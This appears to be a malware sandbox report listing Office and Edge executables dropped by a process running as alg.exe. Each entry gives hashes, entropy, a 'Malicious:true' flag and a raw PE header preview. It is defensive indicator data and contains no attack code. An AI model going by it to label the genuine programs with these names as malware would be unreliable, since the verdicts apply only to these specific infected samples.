                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4993536
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.811043348088706
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:98304:+lkkCqyDEY7+o3OBvfGVY+40ya8yS+9s/pL2D527BWG:wkkCqaE68eV+0ynE6L2VQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6FC20C94DF4704E9DA81CA9C6985FBE8
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:92D6861730C9A253C6D3B0747679E5E65B6E1E6E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6C2AE4D1CE29348B57AB49C9F2BB81FF3D47828C9186D0DE7FB571CC2B65E762
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D5DC0F9F0A35AB5F36DF0AE577993554AE863BB5D88B285FBEC5F5C7D9407B3E98C2D8861140ED5337CC791D9E2456A7790C6FBA6E156B4F19AE01672DF9C588
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ..*..Z........%......`+...@..........................pL......'M......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text.....*.......*................. ..`.rdata........+.......*.............@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1168384
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.044483663946103
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:iNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:isqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9B1B92232B3955318338AF874FB04228
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D1538FB8BEA7BB6F431D79B18C3EC0D1A99B13DC
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D97C669CCC95F9B9E2F5E0309CA78154CDE3E54CF6F618317771856293813D0A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C6ECA2DF1CDFCD99D9B9F59BA003ACF05DBED85ABFA741D876EDF80D9B70E64745CCC3464A73E134509E3BD00717B3CED13FE55C7CCC11BB0E4EC8076B198675
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._...........I.....................................................................%...........Rich...........PE..L....[.d............... .F...P......`?.......`....@.....................................................................................$...........................P}..8....................i......`d..@............`......4o.......................text....E.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....c2r.....................................rsrc...$...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1522688
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.330412995899653
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:/yAAWSS2H8AsqjnhMgeiCl7G0nehbGZpbD:/IUM88Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:5A2CEE4A1733413D807FDA6FCCA28336
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:95DE714AF186990D0A03A4408964CC3E76B92BF4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A508050BF41E981C422A8ADCF15F4B3A59769ED07C018E862BC9659AE96E7264
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:60CEDA5BB56A833CB4596A8766D2F45B58B0C01921DD922928B4A5DA3422BEA1DEB8B1FB948198EEA1797FA051300508ADEFDDD78ABAB800EA6A38DF473E8AC4
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.@.f.@.f.@...@.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@.f.@.d.@...A.f.@...ASf.@..z@.f.@.f.@.f.@...A.f.@Rich.f.@................PE..L......e............... .........................@.....................................................................................,T..............................8...................Hj..........@...................D...`....................text...u........................... ..`.rdata..0...........................@..@.data...............................@....c2r.................d...................rsrc...,T.......V...f..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1293824
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.215539198594708
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:bgd4ajNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:MDZsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:167AFCBDD1474884263B73C575627751
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8A427B27B42A37D3EF14399E19DD45CEBC742648
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:837AD5B6F0FF8DCDFB9FB64A21CA63ABB3518E95AF5FD959B74C6ABF36FF8CDC
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A1D6A1847AAEE30A006958FC08A369A87B427472D20123683A12C45629A18495F0E0032B7C95BB0BBF944686D611194B7D8DA45BFF91C980EB9FE7F4BAC8DC41
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^.U.^.U.^.U.&rU.^.U.$.T.^.U.$.T.^.U.$.T.^.U2,.T.^.U2,.T.^.U.^.U.\.U.$.T.^.U.$.T.^.U.$.T.^.U.$.U.^.U.^vU.^.U.$.T.^.URich.^.U........................PE..L......e............... ............&q............@..................................].......................................p..,.......`...........................(...8...............................@............................................text............................... ..`.rdata..|o.......p..................@..@.data....T.......R..................@....c2r....T....p.......L...................rsrc...`............N..............@..@.reloc...p.......`...^..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1147904
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.039867083469314
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:n0JNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:IsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6F2D927F89898961B7D8F234CFE91CCC
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:482E39BA493FEDA5353A06399EA1FDA52700EF96
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:128DCBEF0F1C01949F5C51C0CCD490CF9C426C72CA3EE0BB22665840A082BA7D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7F89E570894B155CEC3EF48B1EB522C770E0C21BA9789A69B311F9E22783AFFDBEF294FF9E82E21EC0E949E8E5D79301333E0DFC281766580C3DB82D1A6A207F
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T{..T{..T{..].!.D{..4...P{..4...M{..4...X{..4...Q{.....Q{..T{..0{..1...W{..1...S{..1.M.U{..1...U{..RichT{..........................PE..L....[.d............... ."...(......x........@....@.................................c........................................I.......p...............................R..8............................A..@............@..T....H..`....................text...? .......".................. ..`.rdata..(....@.......&..............@..@.data...<....`.......<..............@....rsrc........p.......>..............@..@.reloc...P.......@...D..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1418752
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.397123726083464
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:aAZHHrLZF/FsqjnhMgeiCl7G0nehbGZpbD:aePZF5Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:FAD3AA73FCF9DE08FFE2C21BE15015D3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:AF6314467F6F3A008856D4BB33446799E4800E8B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B0067EF02D5BFB59E2C59C3128CF44C4C612149244F28ACCF23A4A4DB3333874
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0900AE9C0BB66AAA2A67C6B5155FA3DAD415DDCA494046DAE16EE6C08C879164544F04E03748171E3ACC8527F5FAD4441C7F518DF299CBE8AFA26D1793177B33
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!.e...e...e.......n..............I.......w.......p.......d.......r.......n...e...........{.......d...e.F.d.......d...Riche...........................PE..L....;.d............... .....X......q........0....@.................................q+..........................................x.... ...a..............................8..............................@............0..p.......`....................text............................... ..`.rdata......0......................@..@.data....,..........................@....rsrc....a... ...b..................@..@.reloc...p.......`...F..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):53721600
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.543420102632372
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1572864:yNVpTyR96CwKImp81ujlSHFsQ4adtZp20wfP+9HgoZRZa:yQ9lw68HSq
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8CCED2C549B283F40718393C9FC651C2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A4234A88CC046E3C5421A9FE9B42166A6BB5BA72
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BCEAC00CFB5B218403AFFBDCEA952764CAB73305384C599BF65EE8277FC3AD2F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:33F2743D7C5C40A4DEA90EE25DB4D386A4C945866E304B22ECBC21EC940DB817CC58D93420F6BB97CBE39DC181E002086613F90A91D8FB8051BF5872695D4D1E
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......X.mj.r.9.r.9.r.9...9.r.9|..8.r.9|..8;r.9|..8.r.9|..8.r.9...8.r.9...8.r.9...8.r.9.r.9Gm.9y..8.r.9y..8.r.9y..8.o.9y..8.r.9y..9.r.9.r.9.r.9y..8.r.9Rich.r.9........PE..L......e..........".... .._.........y........@f...@.......................... 5.......4.................................[.......h......$DW.........................,q..8...................(.q...... `.@.............`.....d........................text...,._......._................. ..`.rdata...bM...`..dM..._.............@..@.data................\..............@....detourc.............p..............@..@.c2r.....................................rsrc...$DW.....FW.................@..@.reloc....$.. ....#.................@...........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):40811520
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.461588112778556
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:786432:hbuMdv8TOUI/JgcnYblPv+msZPH53u5LBsk/Q4YbFuceo4h5ayMI5:hyM8TOtIlPv+msZPH1u5WkID5uceo4qY
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CC73EBBB1FA9191C1234027E3A6A2656
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CC624039D0721570CCC72F5B771EF872F8131011
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:41D31E02050351249E1C7D766E3E68020412684A6F688FE4F4629329E3477939
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E6C8E870FC78FC89FCDC7784F977E0BFF6B641ECB0E5C7826650C1A4B29F4803FF9D14CEC20E6F60CEBA3C8DA6B46E1745626FEA700DB3B69204920281663313
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........j............sI.....q......q......q......q.....Jy.....Jy.....Jy.............q......q......q......q......q%.....M.....q.....Rich....................PE..L......e............... ............h.......`....@...........................o.....Q.o.............................4...^....P..T....`...]>.............................8........................... 5..@............ ..l............................text...P........................... ..`.rdata..8.;.. ....;.................@..@.data....<.......0..................@....detourc.....0......................@..@.c2r....|....P...........................rsrc....]>..`...^>.................@..@.reloc...P....S..@...|S.............@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1657344
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.635152061116808
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:LE8DMeflpnIOvYUfsqjnhMgeiCl7G0nehbGZpbD:LtDD9pnIOhDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B66C7133483D8529D14BD146998917CE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:750A04A532F74419A0A71834EA0AABD7EC086154
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:29C1A17D1DFF63BD2662F1F94BF1FA194AD8B211F72186039C4A2B3367F44C19
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9E93AD96BFBB69752398D3C4FD7A442C8FD0A5DC112CCF4B75ABAD254F00B4169540FEB62E4D8A0AB53613E8403A9D7830648136D02283B5D95283CAC50C01D1
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@.....................................[.... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4364800
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.748490117644897
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:NB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EGDmg27RnWGj:ZHzorVmr2ZkRpdJYolwD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4F07926D2A4298DAC2EAE14AF4F3B83F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0253F76A97E3CC9DBF6982A3CE5918794A6B4C30
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:92EC152D988645F84FFD85D5BD87660E975438B5FF93F9000E183B46AB8366A3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6F74B4326314619600B176CDFB64842AB95FB6EBBB56AE4D419C85B5E5888A5D21F5DFD86DF87A4D81B757C0DDEB2A074CFCFDA86C44855A70B12168D4A5FBA3
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD.......C... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1238528
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.146950862940549
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:E3w1uVdSEjNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:EEyTNsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4D689BAB6AB247F31547CC0FE6A06B03
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4AE2539483BA58DB0841B42F6720F45AB638E19F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:34DDE1205BB12D83F438E63DFAA8E1F36C3F9B680C7B89FACA9708657477DD06
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4AAF0A833C1CA75EA13B9DE10917186684E91EED658A074883F348D09BE103FE040044637E5F2F7293FF00F44A965BCB2727B2E4A45A4513B2E2DF8A5F7FCE20
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................P............ ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2354176
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.049984883365565
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:whDdVrQ95RW0YEHyWQXE/09Val0GwDmg27RnWGj:whHYW+HyWK7D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:73EC7C3D1F7BBEC6D5CE3CCBE3D406B5
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C54A2E339DDC961186E1CA86BFB6108784E094DE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4A5D2DDCE9F28B9F99E4EA588D4139B97EED995461EA31B91D8642090AA6EFE1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:828562B17DFBCD816F70BDA9D422FF8EE12937AE606264F6429817EE4AF5DC2644A8189B9822D5128D1489D3B14069685165DBD15B74C88568B1F14F83B47018
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%.......$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1825280
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.158500242481018
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:l70E0ZCQZMiU6Rrt9RoctGfmddysqjnhMgeiCl7G0nehbGZpbD:B0EzQSyRPRoc1SDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:50E710BE0314E8B06BEFE100CBD72E82
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C7747418461D1BA01333E5179ADD55D29F7A67E2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:031EB519AE3BDF94C1AAD1C6FB1F5E89AA302C63F9F062787905CB5A646CAB55
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:34E088BB52F2FD123A552B00145B4413F584097DAB35FF3077C0FA108356E70E38573210EEDA6B63D3318CD87FFD15ABF73E579757960B4B14C2FD2847228582
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0............ ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.145490560166867
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:5iD2VmA1YXwHwlklb8boUuWPg2ghsqjnhMgeiCl7G0nehbGZpbD:4D2VmAyiwIb8boQmDmg27RnWGj
